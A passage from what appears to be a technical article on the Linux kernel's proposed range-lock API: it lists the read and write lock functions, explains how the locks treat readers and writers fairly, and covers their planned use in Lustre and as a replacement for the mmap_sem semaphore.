int range_read_lock_interruptible(struct range_lock_tree *tree, struct range_lock *lock); int range_read_lock_killable(struct range_lock_tree *tree, struct range_lock *lock); int range_read_trylock(struct range_lock_tree *tree, struct range_lock *lock);

In any case, a read lock that has been granted must eventually be released with:

void range_read_unlock(struct range_lock_tree *tree, struct range_lock *lock);

If, instead, the range must be written to, a write lock should be obtained with one of:

void range_write_lock(struct range_lock_tree *tree, struct range_lock *lock); int range_write_lock_interruptible(struct range_lock_tree *tree, struct range_lock *lock); int range_write_lock_killable(struct range_lock_tree *tree, struct range_lock *lock); int range_write_trylock(struct range_lock_tree *tree, struct range_lock *lock);

A call to range_write_unlock() will release a write lock. It is also possible to turn a write lock into a read lock with:

void range_downgrade_write(struct range_lock_tree *tree, struct range_lock *lock);

The implementation does not give any particular priority to either readers or writers. If a writer is waiting for a given range, a reader that arrives later requesting an intersecting range will wait behind the writer, even if other readers are active in that range at the time. The result is, possibly, less concurrency than might otherwise be possible, but this approach also ensures that writers will not be starved for access.

This patch set has been through a few revisions and does not seem to be generating much more in the way of comments, so it might be about ready to go. The first user is the Lustre filesystem, which is already using a variant of Kara's range-lock implementation internally to control access to ranges of files. But there is a potentially more interesting user waiting on the wings: using range locks as a replacement for mmap_sem .

The reader/writer semaphore known as mmap_sem is one of the most intractable contention points in the memory-management subsystem. It protects a process's memory map, including, to an extent, the page tables. Many performance-sensitive operations, such as handling page faults, must acquire mmap_sem with the result that, on many workloads, contention for mmap_sem is a significant performance bottleneck. Protecting a process's virtual address space would appear to be a good application for a range lock. Most of the time, a change to the address space does not affect the entire space; it is, instead, focused on a particular set of addresses. Using range locks would allow more operations on a given address space to proceed concurrently, reducing contention and improving performance.

The patch set (posted by Laurent Dufour) does not yet achieve that goal; instead, the entire range is locked every time. Thus, with these patches, a range lock replaces mmap_sem without really changing how things work. Restricting the change in this way allows the developers to be sure that the switch to a range lock has not introduced any bugs of its own. Once confidence in that change exists, developers will be able to start reducing the ranges to what is actually needed.

These changes will need to be made with care, especially since what is being protected by mmap_sem is not always clear. But, given enough development cycles, the mmap_sem bottleneck should slowly dissolve away, leaving us with a faster, more concurrent memory-management subsystem. Some improvements are worth waiting for.

Comments (10 posted)